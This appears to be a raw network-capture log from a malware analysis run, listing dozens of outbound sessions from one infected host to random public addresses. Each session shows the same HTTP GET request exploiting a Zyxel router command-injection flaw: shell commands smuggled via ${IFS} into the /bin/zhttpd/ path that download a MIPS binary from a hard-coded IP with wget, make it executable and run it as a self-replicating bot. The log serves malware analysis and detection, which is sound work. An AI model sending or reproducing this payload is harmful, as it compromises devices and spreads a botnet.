                                          Jan 14, 2024 15:46:18.032252073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4642192.168.2.235620041.41.153.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032283068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4643192.168.2.233496282.18.210.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032341003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4644192.168.2.2358672138.132.49.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032365084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4645192.168.2.234839619.41.99.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032447100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4646192.168.2.234728050.102.188.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032474041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4647192.168.2.2346396185.214.25.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032491922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4648192.168.2.235938234.190.107.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032531023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4649192.168.2.234682641.24.38.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032578945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4650192.168.2.2340124100.196.90.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032617092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4651192.168.2.2342466174.253.99.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032650948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4652192.168.2.2355186152.65.48.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032716990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4653192.168.2.235958693.92.241.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032743931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4654192.168.2.2345186213.119.170.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032764912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4655192.168.2.235654897.19.170.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032799006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4656192.168.2.2338402168.83.212.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032824039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4657192.168.2.23371109.174.242.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032869101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4658192.168.2.235361825.110.87.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032900095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4659192.168.2.235391419.16.159.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032959938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4660192.168.2.2340464177.113.128.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032999039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4661192.168.2.235572679.70.108.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033041954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4662192.168.2.2333264208.199.56.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033083916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4663192.168.2.2360150182.244.241.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033113956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4664192.168.2.234200823.211.15.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033155918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4665192.168.2.235723279.145.238.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033195972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4666192.168.2.233693484.84.199.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033221960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4667192.168.2.233676467.195.47.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033276081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4668192.168.2.233574697.124.126.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033344030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4669192.168.2.2341730171.111.67.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033373117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4670192.168.2.2345836139.224.167.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033411980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4671192.168.2.2336782156.39.194.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033471107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4672192.168.2.23456349.251.97.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033483028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4673192.168.2.2356628142.224.151.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033555984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4674192.168.2.2355568201.138.71.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033590078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4675192.168.2.2357602167.216.73.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033617020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4676192.168.2.233950082.134.115.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033682108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4677192.168.2.2339666157.219.84.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033689022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4678192.168.2.2348742219.92.106.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033715010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4679192.168.2.2346050158.19.69.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033778906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4680192.168.2.234650690.190.136.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033826113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4681192.168.2.233584665.57.59.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033828020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4682192.168.2.2352026120.110.235.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033869028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4683192.168.2.235128627.30.30.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033925056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4684192.168.2.234426679.132.53.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.033943892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4685192.168.2.2354322175.191.21.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034003973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4686192.168.2.235637669.197.85.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034027100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4687192.168.2.235507440.94.66.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034070969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4688192.168.2.2344042166.49.33.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034116983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4689192.168.2.234083086.103.15.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034183025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4690192.168.2.234130099.148.153.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034228086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4691192.168.2.234171854.84.157.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034280062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4692192.168.2.2355232106.179.239.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034317017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4693192.168.2.2337032218.146.203.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034348011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4694192.168.2.233314020.19.69.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034365892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4695192.168.2.2341736181.136.251.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034400940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4696192.168.2.236071887.29.5.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034435987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4697192.168.2.235626097.84.251.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034502029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4698192.168.2.2349826130.53.39.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034524918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4699192.168.2.2360542218.170.200.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034555912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4700192.168.2.2359868180.146.169.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034606934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4701192.168.2.2335210193.244.3.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034662008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4702192.168.2.2343970158.46.32.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034677982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4703192.168.2.2340026210.172.142.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034715891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4704192.168.2.2352374190.149.125.189443
                                          TimestampBytes transferredDirectionData
